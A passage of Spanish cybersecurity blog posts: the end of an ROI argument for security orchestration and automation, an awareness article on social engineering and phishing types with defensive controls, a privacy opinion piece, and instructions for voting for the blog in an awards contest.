cosas simples, utilizaremos un salario medio de 50K por empleado de seguridad (España no se caracteriza por su grandes sueldo). Incluso sin incluir otras formas de compensación (como beneficios o sociales o en especies), si la jornada es de 40 horas a la semana durante 48 semanas del año (siendo conservador), eso equivale a alrededor de 26 €/hora. En muchas organizaciones, los empleados de seguridad pasan gran parte de su tiempo tratando alertas de seguridad, siendo además, muchas de ellas falsos positivos. Una empresa de miles de trabajadores , recibe un volumen de cientos o miles de alertas de seguridad al día, eso incluye todo, desde falsos positivos hasta indicadores reales de compromiso. Por lo tanto, no es de extrañar que los equipos de seguridad de todo el mundo sufran fatiga de alertas. Mirando los números, la fatiga de alerta probablemente esté costando una "tonelada" de dinero a las empresas. Ademas de que también puede costar la reputación, al no tratar de una forma adecuada las alertas importantes, ya que las amenazas reales pasan inadvertidas debido a la fatiga de alertas diarias. Ahora, no todas las alertas se investigan, pero para las que se investigan manualmente, en promedio, la demora es de más de 30 minutos. Si multiplicamos eso por la cantidad de alertas que se manejen todos los días. Naturalmente, a medida que ingresan más alertas, es necesario realizar más contrataciones para atenderlas, por lo que los costos de personal aumentan con el tiempo, generando una relación directa "alertas/personal". La conclusión, es que no se quiere que el talento en ciberseguridad, que tanto costó adquirir, pase su valioso tiempo en tareas manuales repetitivas. La organización, orquestación y automatización de la seguridad pueden ayudar a optimizar el valor de cada miembro del equipo, permitiendo centrar los esfuerzos estratégicos de valor agregado que pueden hacer que el negocio avance más rápido y de manera más efectiva. > La rutina es el hábito de renunciar a pensar ### Los procesos de ciberseguridad Lleva un tiempo considerable desarrollar buenos procesos de seguridad, que funcionen consistentemente, ahorren tiempo y mejoren la postura general de seguridad. Muchos procesos se manejan de forma manual, lo que puede tomar grandes cantidades de tiempo. Por ejemplo, para investigar manualmente un intento de suplantación de identidad, tendremos que hacerlo manualmente: - Atender la alerta - Extrae la URL, direcciones IP, dominios, hashes o archivos adjuntos - Escanear los contenidos para ver su reputación o ver si se encuentra contenido malicioso - Si realmente es malicioso, realizaremos una escalada creando un ticket y notificando al equipo de CSIRT - Averigüar si el usuario hizo clic en el enlaces o descargó el contenido y, de ser así, qué sucedió después - Si se descargó algún código malicioso, deberemos: Averiguar dónde está ubicada la máquina de la víctima Identificar los archivos comprometidos Limpiar y restaurar Puede llevar mucho tiempo desarrollar un proceso de seguridad claro como el anterior y luego capacitar al equipo sobre cómo ejecutar el mismo. Además, una vez que se desarrolla un proceso, necesita ser probado y mantenido y actualizado regularmente. Podemos ver cómo los procesos manuales pueden ocupar bastante tiempo del equipo de seguridad. Esta cantidad de tiempo y esfuerzo a menudo es insostenible dada la escasez de talento de seguridad y la necesidad de aprovechar el mismo. ### Tecnologías de ciberseguridad Las herramientas que necesitamos comprar para llevar a cabo una respuesta efectiva a los incidentes dependerán de nuestra organización. Estas son las principales categorías que podemos necesitar: - Monitorización de seguridad de la red/host - Recolección y agregación de registros - Seguridad de aplicaciones - SIEM y consolas de eventos - Análisis de malware - Inteligencia de amenazas Si no se cuenta con todas estas herramientas, es posible que usar algunas herramientas de seguridad de código abierto para empezar. Sin embargo, realizar inversiones en estas áreas, facilitará el proceso de respuesta a incidentes. Recuerda: a menudo hay un costo de personal asociado para ejecutar y mantener estas herramientas. Incluso con las mejores herramientas, no podremos utilizarlas en todo su potencial sin la capacidad de integrarlas y automatizar los procesos entre ellas. Si omitimos por completo la integración, eso agrega costes en forma de esfuerzo humano manual. Si decidimos crear integraciones personalizadas, esto puede llevar bastante tiempo antes de poder usar las herramientas en su máximo resplandor. ## El coste de desarrollar la orquestación y automatización en seguridad Llegado a este punto, es probablemente que haya llegado a la conclusión de que los procesos de seguridad manuales no son la forma más eficiente o efectiva de avanzar en seguridad (O esa he intentado trasmitiros). Puede que pienses, está bien: construiremos algo de automatización en nuestros flujos de trabajo. Pero esto, desafortunadamente, no es tan simple. Las empresas que intentan construir sus propios sistemas de automatización de seguridad patentados desde cero lo hacen por buenas razones. ¡Quieren aprovechar todos los beneficios que la automatización puede ofrecer! . Pero el desarrollo propio de la automatización, a menudo tiene muchos costes ocultos desagradables que van apareciendo sin darnos cuenta, y que lapidan en dinero nuestras ganas y ROI en la automatización de la seguridad: - El tiempo que lleva construir una automatización casi siempre es mucho mayor que lo planificado. - Con frecuencia, los equipos se topan con inconvenientes a lo largo del camino, crece el alcance y, finalmente, se recurre a consultores expertos para avanzar en el proceso, lo que puede costar mucho dinero y ampliar el proyecto. - El tiempo que los expertos en seguridad o desarrolladores pasan a desarrollar la construcción de automatización, no pueden dedicarlo a otros trabajos, como proyectos generadores de ingresos, u otro trabajo de prioridad alta. - El costo de mantenimiento de los sistemas de automatización cuando se introducen nuevos procesos o herramientas En la mayoría de los casos, desde una perspectiva de coste y tiempo, crear nuestra propia orquestación y automatización de seguridad, simplemente no tiene sentido. Todo esto se suma al coste de sus herramientas y personal. ## El coste de la automatización "out-of-the-box" en ciberseguridad Entonces, ¿cuál es la alternativa? Si deseamos aprovechar todo lo que la automatización puede ofrecer, sin los altos costos del desarrollo, invertir en una plataforma de automatización y orquestación de seguridad lista para usar, es nuestra mejor opción. Por supuesto, tienen sus propios costes. Pero la buena noticia es que nos ayudarán a obtener más de nuestras inversiones en seguridad actual, incluidas personas, procesos y herramientas. No solo eso, sino que lo hacen de manera más rápida y más eficiente, por lo que el retorno de la inversión es rápidamente alcanzable. ### Beneficios en las personas El tiempo humano, y el coste de su tiempo, es el área donde veremos los mayores ahorros y el ROI al implementar la orquestación y la automatización en seguridad. Debido principalmente a que dedicaremos menos tiempo a los procesos manuales, pudiendo hacer más con el personal que tenemos. Podremos así poner a nuestro mejor talento para trabajar en iniciativas de defensa más estratégicas, como la administración de vulnerabilidades o la búsqueda de amenazas, lo que las hará más felices, pudiendo retener el talento a largo plazo. Cuanto menos tiempo dedique el equipo de seguridad altamente capacitado a los procesos manuales, mejor será el ROI de nuestros recursos humanos. ### Beneficios en los procesos Las plataformas de automatización y orquestación de seguridad agilizan la creación de procesos automatizados y, a menudo, muchas ofrecen flujos de trabajo incorporados o aportados por la comunidad. Cuando es necesario crear procesos automatizados personalizados, desarrollarlos y ejecutarlos debemos hacerlo más rápido que nunca. Cuando dedicamos menos tiempo de trabajo en estos procesos, es tiempo que se puede canalizar en la caza y el análisis de amenazas utilizando el contexto detallado que ofrecen las soluciones de orquestación y automatización. ¿El resultado? Procesos optimizados que permiten una respuesta más rápida, efectiva y precisa a las amenazas que afectan a nuestra organización. ### Beneficios en la tecnología Con una solución lista para usar, seguiremos utilizando los mismos productos que normalmente usaríamos para realizar las operaciones de seguridad. Sin embargo, podremos extraer más valor de ellos mediante integraciones y flujos de trabajo automatizados. Muchas plataformas de automatización y orquestación de seguridad ofrecen integración preconstruida para estas herramientas, lo que significa que es fácil de usarlas, no requieren trabajos manuales ni codificaciones. En pocas palabras, la orquestación de seguridad y la automatización nos permiten obtener más de los recursos en los que ya hemos invertido. El único coste nuevo será "la plataforma" (Os traeré en otro post las soluciones SOAR), que con la cantidad de tiempo humano que ahorramos y, en última instancia, el ahorro de costos, justificará el compra de esta. ## El ROI de la automatización en ciberseguridad aplicada Hemos tratado las ventajas y la teoría de ROI en la orquestación y automatización de ciberseguridad, pero pongamos estos conceptos a trabajar. Primero, recordamos que estamos usando el salario promedio de 50K para un empleado de seguridad. Eso se reduce a un salario por hora de alrededor de 26€, que desglosado aún más a minutos, es 0,44 céntimos por minuto. En segundo lugar, una alerta, de media, lleva al menos 30 minutos para ser clasificada, investigada, notificada y tratada. Todo ese trabajo es manual, así que multiplica 30 minutos por 0,44 cnt/mint. Esto significa que cada alerta nos costará 13,20 € por incidente. En tercer lugar, si pensamos en cuántas alertas manejamos en un día. Para una empresa medina/grande , usemos 50 alertas por día como ejemplo. Eso significa que gastamos 660 € por día en alertas (Tirando muy por lo bajo). Sie esto lo pasamos por los 365 días, suponiendo que tenemos un SOC de 7 días a la semana, hablariamos de 241K € por año solo en tratamiento de alertas. Ahora, sabemos que el capital debe invertirse para proteger a la organización. Pero con las nuevas tecnologías disponibles, como la orquestación de seguridad y la automatización, nuestro capital puede invertirse en otras formas más valiosas y significativas, no solo para el beneficio de la organización, sino también para los miembros del equipo de seguridad. Si suponemos que los 30 minutos del tratamiendo de la incidencia la desglosamos en tratamiento de alertas,escalado,análisis y respuesta , podríamos reducir a 0 el tiempo invertido por ejemplo en análisis o escalado mediante la automatización, reduciremos el coste de cada incidencia a 2,2 €. La comparación del proceso manual con el proceso automatizado muestra una reducción del 83.3% en tiempo y coste. Ese ahorro de coste equivale a aproximadamente 8 nuevas personas que podríamos contratar o innumerables nuevos productos de seguridad que podríamos adquirir. La belleza de la orquestación y la automatización de seguridad es que se puede personalizar en función de nuestra organización y sus necesidades. ## Conclusión Hemos visto cuánto tiempo y dinero nos puede ahorrar la orquestación y la automatización de seguridad. Podemos agregar estos dos conceptos con desarrollos personalizados, pero ya hemos visto que esta no es la mejor opción, usar una plataforma de orquestación y automatización aportará valor y demostrará un ROI a un ritmo considerablemente más rápido y efectivo. ¡La automatización en ciberseguridad aumenta la productividad, la eficiencia y la precisión! Proveedores destacados en SOAR ( Security Orchestration, Automation and Response ) : - Anomali - Ayehu - CyberSponse - Demisto - DFLabs - EclecticIQ - IBM (Resilient Systems) - Microsoft (Hexadite) - Phantom Soy muy FAN de Splunk que ha adquirido Phantom recientemente - Resolve Systems - ServiceNow Security Operations - Siemplify - Swimlane - Syncurity - ThreatConnect - ThreatQuotient - Komand --- # Anatomía del ataque de ingeniería social y cómo prevenirlo URL: https://ciberseguridad.blog/anatomia-del-ataque-de-ingenieria-social-y-como-prevenirlo/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-04-09 Actualizado: 2026-10-04 Tema: Vulnerabilidades y Ataques Informaticos > Los ataques de ingeniería social no solo se están volviendo más comunes en las empresas , sino que cada vez son más sofisticados. ¡CONOCE COMO PREVENIRLOS! Como indica MAGERIT , que es la metodología de análisis y gestión de riesgos elaborada por el Consejo Superior de Administración Electrónica, la ingeniería social es el abuso de la buena fe de las personas para que realicen actividades que interesan a un tercero, en este casi, un atacante. [Vídeo](https://www.youtube.com/watch?v=SFIUu39Y_e0) Cada ataque de Ingeniería Social es único, pero con un poco de comprensión de las situaciones encontradas, podemos indicar un ciclo de vida de la amenaza aproximado de todas las actividades a las que afecta un proyecto de Ingeniería Social, estudiado a través de varios resultados exitosos. La representación general del ciclo de vida de ingeniería social en cuatro principales etapas sería: Footprinting -> Relación de confianza -> Manipulación psicológica -> Salida. Footprinting : Es la técnica de acumular información sobre el (los) objetivo (s) y el entorno ambiente. El Footprinting puede revelar a las personas relacionadas con el objetivo con quien el atacante tiene que establecer una relación, a fin de mejorar las posibilidades de un ataque exitoso. La recopilación de información durante la fase de Footprinting incluye, pero no está limitada a: - Lista de nombres de empleados y números de teléfono - Organigrama - Información del departamento - Información sobre la ubicación El Footprinting generalmente se refiere a una de las fases de preataque; tareas realizadas antes de hacer el ataque real de Ingeniería Social. Algunas de las herramientas utilizadas por los atacantes e esta fase, serian : creepy ,SET y Maltego , haciendo de la obtención de datos de compromiso de Ingeniería Social más fácil. Relación de confianza: Una vez que se han enumerado los posibles objetivos, el atacante pasa a desarrollar una relación con el objetivo que generalmente es un empleado o alguien que trabaja en el negocio para desarrollar una buena relación con ellos. La confianza que está ganando el ingeniero social se usará luego para revelar piezas confidenciales de información que podría causar daños graves al negocio Manipulación psicológica : En este paso, el ingeniero social manipula la confianza que ha ganado en la anterior fase para extraer tanta información confidencial u obtener operaciones confidenciales relacionadas al sistema de destino realizado por el propio empleado para penetrar en el sistema con mucha facilidad. Una vez que se ha recopilado toda la información confidencial requerida, el ingeniero social puede pasar al siguiente objetivo o avanzar hacia la explotación del sistema actual bajo consideración. Salida : Ahora, después de que se haya extraído toda la información real, el ingeniero social tiene que hacer una salida clara de manera pueda desviar cualquier tipo de sospecha innecesaria sobre sí mismo. Él se asegurará de no dejar ningún tipo de prueba de su visita que pueda llevar un rastro de su identidad real ni de que lo vincule a la entrada no autorizada en el sistema objetivo en el futuro. ## Tipología de ataques de Ingeniería Social Estos tipos de ataques pueden ayudar al atacante a obtener acceso a cualquier sistema independientemente de la plataforma, software o hardware involucrado. Mostraremos a continuación algunas de las técnicas más populares utilizadas para realizar un ataque de Ingeniería Socia: Shoulder Surfing : Es un ataque de seguridad donde, el atacante usa técnicas de observación, como mirar por encima del hombro de alguien, para obtener información mientras se desempeñan alguna acción que implica el uso explícito de información sensible y visible. Esto puede ser realizado a corta distancia, así como a un largo alcance utilizando binoculares u otra visión mejorada de dispositivos. Dumpster Diving : Muchas veces, grandes organizaciones descargan elementos como guías telefónicas de la compañía, manuales del sistema, organigramas, manuales de políticas de la compañía, calendarios de reuniones, eventos y vacaciones, impresiones de datos confidenciales o nombres de usuario y contraseñas, impresiones de la fuente código, discos y cintas, membretes de la compañía y formularios de notas, y hardware desactualizado descuidadamente en los contenedores de la compañía. Un atacante puede usar estos elementos para obtener una gran cantidad de información sobre la organización de la empresa y la estructura orgánica de la misma. Este método de búsqueda a través del contenedor de basura, en busca de información potencialmente útil , suele estar “no identificado” por los empleados de una empresa y es conocido como Dumpster Diving Juego de roles : Es una de las armas clave para un ingeniero social. Implica persuadir o reunir información mediante el uso de una sesión de chat en línea, correos electrónicos, teléfono o cualquier otro método que nuestra empresa utilice para interactuar en línea con el público, pretendiendo ser un servicio de ayuda, empleado, técnico, indefenso o un usuario importante para divulgar información confidencial. Caballo de Troya : Es uno de los métodos más predominantes actualmente utilizados por los piratas informáticos que implican engaños las víctimas para descargar un archivo malicioso al sistema, que en la ejecución crea una puerta trasera en la máquina que puede ser utilizada por el atacante en cualquier momento en un futuro y por lo tanto tener acceso completo a la máquina de la víctima. Phising : Es el acto de crear y usar sitios web y correos electrónicos diseñados para parecerse a los de conocidos negocios legítimos, instituciones financieras y agencias gubernamentales para engañar a los usuarios de Internet para que revelen su información personal y afirmando falsamente ser una empresa legítima establecida en un intento de estafar al usuario en la entrega privada información que será utilizada para el robo de identidad. Crawling Sitios web de organizaciones y foros online: Gran cantidad de información con respecto a la estructura de la organización, correos electrónicos, números de teléfono están disponibles abiertamente en el sitio web de la compañía y otros foros online. Esta información puede ser utilizado por el atacante para refinar su enfoque y crear un plan sobre a quién dirigirse y el método a ser utilizado Ingeniería Social Inversa: Un ataque de ingeniería social inverso es un ataque en el que un atacante convence al objetivo que tiene un problema o puede tener un cierto problema en el futuro y que el atacante, está listo para ayudar a resolver el problema. La ingeniería social inversa implica tres partes: Sabotaje : Después de que el atacante obtiene un acceso simple al sistema, corrompe el sistema o le da la apariencia de estar corrupto. Cuando el usuario ve el sistema en el estado corrupto, comienza a buscar ayuda para resolver el problema. Marketing : Para asegurarse de que el usuario se acerca al atacante con el problema, el atacante se anuncia a sí mismo como la única persona que puede resolver el problema. Soporte : En este paso, gana la confianza del objetivo y obtiene acceso a la información confidencial solicitada. ## ¿Qué es phishing? La forma más común de phishing es el tipo general, enviar correos masivos, donde alguien envía un correo electrónico pretendiendo ser otra persona e intenta engañar al destinatario para que haga algo, usualmente iniciando sesión en un sitio web o descargando malware. Los ataques a menudo se basan en la suplantación de correo electrónico, donde el encabezado del correo electrónico o el campo de origen, se falsifica para hacer que el mensaje aparezca como si hubiera sido enviado por un remitente de confianza. Algunos ataques están diseñados específicamente para organizaciones e individuos, y otros se basan en métodos distintos al correo electrónico. ## ¿Qué es spear phishing? Los ataques de phishing toman su nombre de la idea de que los estafadores están pescando víctimas al azar mediante el uso de correos electrónicos falsos o fraudulentos como cebo. Los ataques de Spear phishing extienden la analogía de dicha pesca ya que los atacantes están dirigidos específicamente a las víctimas y organizaciones de alto valor. Los ataques de Spear phishing son extremadamente exitosos porque los atacantes pasan mucho tiempo elaborando información específica para el destinatario, como, hacer referencia a una conferencia a la que el destinatario acaba de asistir o enviar un archivo adjunto malicioso donde el nombre del archivo hace referencia a un tema que le interesa al destinatario. Como ejemplo: Group 74 (también conocido como Sofact, APT28, Fancy Bear) apuntó a profesionales de ciberseguridad con un correo electrónico que pretendía estar relacionado con la conferencia Cyber Conflict US, un evento organizado por el Army Cyber Institute de la Academia Militar de los Estados Unidos. CyCon es una conferencia real, pero el archivo adjunto era en realidad un documento que contenía una macro maliciosa de Visual Basic para Aplicaciones (VBA) que descargaría y ejecutaría un malware de reconocimiento llamado Seduploader. ## ¿Qué es el Whalling? “La caza de ballenas” , un ataque de phishing específicamente dirigido a los altos ejecutivos de la empresa,llamado así ya que se considera que la víctima es de alto valor, y la información robada será más valiosa de lo que un empleado regular puede ofrecer. Las credenciales de la cuenta que pertenecen a un CEO abrirán más puertas que un empleado de bajo nivel. El Whalling requiere investigación adicional porque el atacante necesita saber con quién se comunica la víctima prevista y el tipo de discusiones que tienen. Los ejemplos incluyen referencias a quejas de clientes, citaciones legales o incluso un problema en la suite ejecutiva. Los atacantes generalmente comienzan con ingeniería social para reunir información sobre la víctima y la compañía antes de elaborar el mensaje de phishing que se usará en el ataque. ## ¿Qué es el Bussiness email compromise (BEC)? Además de las campañas generales de phishing distribuidas en masa, los delincuentes se dirigen a personas clave en los departamentos de finanzas y contabilidad a través de estafas de compromiso de correo electrónico comercial (BEC) y fraude de correo electrónico de CEO. Al hacerse pasar por funcionarios financieros y directores ejecutivos, estos delincuentes intentan engañar a las víctimas para que inicien las transferencias de dinero en cuentas no autorizadas. Por lo general, los atacantes ponen en peligro la cuenta de correo electrónico de un alto ejecutivo o funcionario financiero explotando una infección existente o mediante un ataque de spear phishing. El atacante acecha y supervisa la actividad de correo electrónico del ejecutivo durante un período de tiempo para conocer los procesos y procedimientos dentro de la empresa. El ataque real toma la forma de un correo electrónico falso que parece que proviene de la cuenta del ejecutivo comprometido que se envía a alguien que es un destinatario habitual. El correo electrónico parece ser importante y urgente, y solicita que el destinatario envíe una transferencia bancaria a una cuenta bancaria externa o desconocida. El dinero finalmente aterriza en la cuenta bancaria del atacante. ## ¿Qué es clone phishing? Clonar el phishing requiere que el atacante cree una réplica casi idéntica de un mensaje legítimo para engañar a la víctima haciéndole creer que es real. El correo electrónico se envía desde una dirección similar al remitente legítimo, y el cuerpo del mensaje tiene el mismo aspecto que un mensaje anterior. La única diferencia es que el archivo adjunto o el enlace en el mensaje se ha intercambiado con uno malicioso. El atacante puede decir algo similar a tener que volver a enviar el original, o una versión actualizada, para explicar por qué la víctima estaba recibiendo el "mismo" mensaje de nuevo.Este ataque se basa en un mensaje legítimo visto anteriormente, lo que hace que sea más probable que los usuarios caigan en el ataque. ## ¿Qué es vishing? Vishing significa "phishing de voz" y conlleva el uso del teléfono. Por lo general, la víctima recibe una llamada con un mensaje de voz disfrazado como una comunicación de una institución financiera. Por ejemplo, el mensaje puede solicitarle al destinatario que llame a un número e ingrese la información de su cuenta o PIN por razones de seguridad u otros fines oficiales. Sin embargo, el número de teléfono suena directamente al atacante a través de un servicio de voz sobre IP. ## ¿Qué es snowshoeing? El rastreo de raquetas de nieve o spam “hit-and-run” , requiere que los atacantes envíen mensajes a través de múltiples dominios y direcciones IP. Cada dirección IP envía un volumen bajo de mensajes, por lo que las tecnologías de filtrado de spam basado en la reputación o el volumen no pueden reconocer y bloquear mensajes maliciosos de inmediato. Algunos de los mensajes llegan a las bandejas de entrada de correo electrónico antes de que los filtros aprendan a bloquearlos. Las campañas Hailstorm “granizadas”, funcionan igual que las snowshoeing, excepto que los mensajes se envían en un lapso de tiempo extremadamente corto. Algunos de estos ataques terminan justo cuando las herramientas antispam detectan y actualizan los filtros para bloquear futuros mensajes, pero los atacantes ya han pasado a la siguiente campaña. ## Método de protección de alto nivel No hay una forma efectiva de protegerse contra un ataque de Ingeniería Social porque no importa qué se implementan controles, siempre existe ese "factor humano" que influye en el comportamiento de un individual. Pero, hay ciertas formas de reducir la probabilidad de éxito del ataque. También es importante para organizaciones para establecer una política de seguridad clara y sólida y procesos para reducir la amenaza de Ingeniería social. Los siguientes son algunos de los pasos para garantizar la protección contra el ataque de Ingeniería Social: Entrenamientos de Concienciación de Seguridad: La concienciación de seguridad es la solución más simple para prevenir ataques de ingeniería social. Cada persona en la organización debe recibir capacitación básica sobre seguridad de manera oportuna para que él/ella nunca dé ninguna información sin la autorización apropiada y para que se conozca que se debe informar de cualquier comportamiento sospechoso. Verificación de fondo: Hay muchas posibilidades de que un atacante se una a la empresa como empleado para reunir información privilegiada sobre la compañía. Esto hace que la detección de antecedentes sea realmente importante parte de las políticas de la empresa para contrarrestar el ataque de ingeniería social. No solo debe ser limitado a los empleados internos, pero también debe extenderse también a los proveedores y otros trabajadores contratados antes de que se conviertan en parte de la organización o se le dé acceso a la organización red. Seguridad física: Debe haber un mecanismo de control de acceso adecuado para asegurarse que solo a las personas autorizadas se les permite el acceso a secciones restringidas de la organización. Fuga de datos: Debe haber una monitorización constante de toda la información sobre la organización colgada en Internet. Cualquier tipo de irregularidad debe ser inmediatamente tratada. Esto dificultará la recolección pasiva de información del atacante mediante varias herramientas, como podría ser spiderfoot . Simulacros de ingeniería social: Se deben realizar actividades especiales de Ingeniería Social con los empleados internos de la organización, ya sea por el equipo de seguridad o por el proveedor, a fin de realizar un seguimiento del nivel de la seguridad sobre la conciencia en la organización. Política de clasificación de datos: Debe haber una clasificación adecuada de los datos en función de sus niveles de criticidad y el personal de acceso. La clasificación de datos asigna un nivel de sensibilidad a la información de la empresa. Cada nivel de clasificación de datos incluye diferentes reglas para ver, editar y compartir los datos. Esto ayuda a detener a la ingeniería social al proporcionar a los empleados un mecanismo para entender, qué información se puede divulgar y qué no se puede compartir sin la debida autorización. Algunos controles adicionales que deberíamos tenerse en cuenta para reducir el éxito de un ataque de Ingeniería Social a alto nivel, podríamos enumerarlos a continuación: - Instalar y mantener los firewalls, antivirus, software antispyware y filtros de correo electrónico. - No permitir que las personas se pongan detrás al escribir información confidencial. - Tener una estrategia adecuada de respuesta a incidentes en la organización. - El uso de identificaciones corporativas en dominio público, blogs, foros de discusión, etc. debe estar prohibido. - Se debe prestar atención a la URL de un sitio web. Aunque los sitios web maliciosos generalmente se ven idénticos a un sitio legítimo, pero la URL puede usar una variación en la ortografía o un dominio diferente. - No se debe acceder a los detalles confidenciales y críticos en línea como el buzón de correo corporativo en lugares públicos, cafés y hoteles, etc. donde no se puede confiar en la seguridad del punto de Acceso a Internet. - No enviar información sensible a través de Internet antes de verificar la seguridad de los sitios web. - No revelar información personal o financiera por correo electrónico, al igual que no responder al correo electrónico sobre solicitudes de información similar. - Verificar que todos los puntos físicos de entrada y salida estén asegurados en todo momento. - No proporcionar información personal o información sobre su organización a nadie a menos que estar seguro de la autoridad de la persona para tener esa información. - Usar el teclado virtual cuando corresponda. - Tener mucho cuidado con lo que se proporciona/indica en el sitio web de su empresa. Evitar publicar gráficos organizacionales o listas de personas clave siempre que sea posible. - Asegurarse de destruir cualquier documento descartado que pueda contener datos confidenciales. - Implementar un buen filtro de SPAM que detecte virus, remitentes en blanco, etc. - Desarrollar una política de seguridad que incluya, pero no se limite a, la caducidad de la contraseña y la complejidad. - Implementar un filtro web para bloquear sitios web maliciosos. - Cifrar toda la información sensible de la compañía. - Convertir el correo electrónico HTML en mensajes de texto o deshabilitar los mensajes de correo electrónico HTML. ## Conclusión Con la excepción de los riesgos planteados por el phishing, la amenaza de la ingeniería social como una forma de acceder a los sistemas corporativos de TI parece a menudo pasarse por alto a favor de asegurar esos sistemas contra los ataques informáticos. Esperamos que con este post, se haya demostrado que la clave para asegurar los sistemas de TI de nuestra organización radica en la preparación de todas las vías de ataque; cerrar las puertas delantera y trasera y todas las ventanas no es una buena idea si hay un agujero en el techo, después de todo. Las personas son un componente vital y a menudo, pasado por alto en los sistemas de seguridad como parte de la superficie de ataque disponible para un atacante, y sin el conocimiento y la capacitación adecuados puede ser el eslabón débil que expone sus datos al mundo. --- # ¿Qué necesitamos para concienciarnos acerca de la privacidad? URL: https://ciberseguridad.blog/que-necesitamos-para-concienciarnos-acerca-de-la-privacidad/ Tipo: Artículo Autor: Luis Melon Publicado: 2018-04-04 Actualizado: 2026-10-04 Tema: Compliance > Proteger nuestra privacidad en internet es esencial. Debemos concienciarnos, no solo a base de escándalos como Facebook ! Conoce cuando empezó todo ¡ Un año después de la fundación de Facebook, hubo multitud de quejas de los defensores de la privacidad, estos denunciaban que había una empresa de Internet, que realizaba un seguimiento de los hábitos de los usuarios y encontraba constantemente nuevas formas para explotar dicha información personal para poder sacar beneficio. Seguro que todo el mundo que ha leído el párrafo anterior está pensando en Facebook, pero esta empresa por la que los defensores de la privacidad estaban preocupados era Amazon. La preocupación principal era que Amazon recopilaba demasiados datos sobre lo que sus clientes compraban, pensaban en comprar o deseaban que otros les compraran, sin mencionar la información de la tarjeta de crédito. Durante todo este tiempo ha habido una recolección continua por parte de los “gigantes de Internet” de datos acerca de sus clientes sin apenas escrutinio de cuanta información recopilan y qué uso le dan. Por parte de los usuarios la respuesta mayoritaria a esto ha sido continuar entregando más y más información personal a todo este tipo de empresas que cada vez están más integradas en la vida cotidiana. La respuesta que suelen dar las compañías cada vez que se pone en duda la recolección masiva de todos estos datos, es de la línea que la respuesta que dio el CTO de Amazon cuando hubo las quejas que se mencionan al principio del artículo, "recopilamos la mayor cantidad de información posible para poder ofrecerle el mejor servicio". Pero como siempre hace falta un gran escándalo o problema para que la gente se conciencie o empiece a concienciarse, en este caso la noticias de que Cambridge Analytica, una empresa de datos vinculada a la campaña del presidente Donald Trump, habría accedido a información de unos 50 millones de usuarios de Facebook sin que lo supieran. [Vídeo](https://www.youtube.com/watch?v=3kwOqnZCe5k) Esta noticia ha provocado que los usuarios de internet tomen consciencia de qué datos personales estan proporcionando y cuáles de ellos recopilan las empresas, dándose cuenta de que esos datos no sólo se pueden utilizar para proporcionarte un mejor servicio o venderte productos, sino como se ha visto en este caso, para afectar a unas elecciones. Muchos de los usuarios se sorprenderían de los datos que tienen almacenados muchas de las grandes empresas de Internet sobre nosotros, como YouTube, Facebook, Google, Apple. Este asunto no es nuevo, pero hasta la noticia de Cambridge Analytica no se había hecho tan viral. Por ejemplo, la Comisión Federal de Comercio de los Estados Unidos ya denunció que Facebook permitía que las aplicaciones de terceros accedieran a más datos de los usuarios de los que necesitaban para operar. Apple fue criticada en 2011 por almacenar los datos de ubicación del usuario. Y Google recibió una multa en 2013 por recopilar datos de usuarios desconocidos mientras reunía imágenes de mapas para Streetview. Según la forma de negocio y servicio que hay hoy en día, es inevitable que haya que compartir información personal para que así se nos pueda proporcionar un mejor servicio. No estoy diciendo que esto no debería ser así, pero lo que sí que habría que aumentar son los controles y las regulaciones a las empresas que tienen toda esta información, y que se utilice como único fin de mejorar la experiencia del usuario y proporcionar un mejor servicio, pero nunca con otros fines. También se debería informar de forma clara y concisa cómo se utiliza la información y no esconderla, en muchas ocasiones, en condiciones o definiciones muy extensas pensadas para que el usuario (aunque de forma incorrecta) las acepte sin leer debido a la parrafada del texto. También con esto debemos reflexionar sobre nuestra forma de actuar y la forma de actuar de las administraciones. ¿Es necesario un escándalo para que nos concienciemos de qué información compartimos en las redes? ¿Es necesario un escándalo para que las administraciones pongan los controles necesarios a estas empresas? --- # Nos presentamos a los premios 20 Blogs ¡Nos ayudas! URL: https://ciberseguridad.blog/nos-presentamos-a-los-premios-20-blogs-nos-ayudas/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-03-27 Actualizado: 2026-10-04 Tema: Noticias Seguridad > Un año de grandes progresos, de metas , mucho trabajo ... pero no nos conformamos, seguimos soñando, nos hemos presentado a los premios 20 Blogs ¡AYUDANOS! Es ya algo más de un año el que llevamos escribiendo posts que consideramos os puedan aportar. Post que aunque no publicamos con tanta asiduidad como nos gustase, escribimos, intentando aportaros un poquito del tan preciado "conocimiento colectivo" que tanto necesitamos. Un año de grandes progresos, de metas alcanzadas y de mucho trabajo detras ... pero no nos conformamos, seguimos intentando mejorar, aprender, seguimos soñando, y por eso, nos hemos presentado a los premios 20 Blogs que organiza 20 minutos. Os necesitamos para progresar , ayudanos y vota . ## Como votar a CIBERSEGURIDAD .BLOG en los premios 20 blogs 1.Ir a Premios 20 Blogs 2. Click en “Vota en el consurso” [Imagen: 1_Premios_20_minutos_Blogosfera] 1. Es necesario estar registrado para votar “Registrate” [Imagen: 2_Premios_20_minutos_Blogosfera] 1. Rellenar los campor obligatorio: - Nombre de usuario - Contraseña - Correo electronico -> Es necesario confirmar email - Repetir Correo electronico - Nombre -> Poner nombres de habla hispana - Apellidos -> Poner apellidos de habla hispana [Imagen: 3_Premios_20_minutos_Blogosfera] 1. Pulsar los Check que consideres: - [ ] He leído y aceptado - [ ] He leído y aceptado el tratamiento - [ ] No deseo recibir información - [ ] Deseo recibir información Click “No soy un robot” recaptcha y posteriormente “Activar registro de usuario” . [Imagen: 4_Premios_20_minutos_Blogosfera] 1. Es necesario confirmar el email [Imagen: 5_Premios_20_minutos_Blogosfera] 1. Click en link de confirmación [Imagen: 6_Premios_20_minutos_Blogosfera] 1. El link inicia la sesion en la web de 20 minutos [Imagen: 7_Premios_20_minutos_Blogosfera] 9.Ir a Premios 20 Blogs 10. Click en “Vota en el consurso” [Imagen: 1_Premios_20_minutos_Blogosfera] 1. Buscar en la letra C nuestro blog "Ciberseguridad.blog" (Pagina 1 de la C) - Selecionar la categoria “Innovación, ciencia y tecnología” [Imagen: 8_Premios_20_minutos_Blogosfera] [Imagen: 9_Premios_20_minutos_Blogosfera] - Click “Ir a la ficha para votar a este blog” y "Vota a este blog" * Indicar 5 estrellas y votar [Imagen: 10_Premios_20_minutos_Blogosfera] - Selecionar la categoria “Innovación, ciencia y tecnología” * Indicar 5 estrellas y votar 1. 1000 gracias [Imagen: 11_Premios_20_minutos_Blogosfera] --- # Indicadores de detección APT (Advanced Persistent Threat) URL: 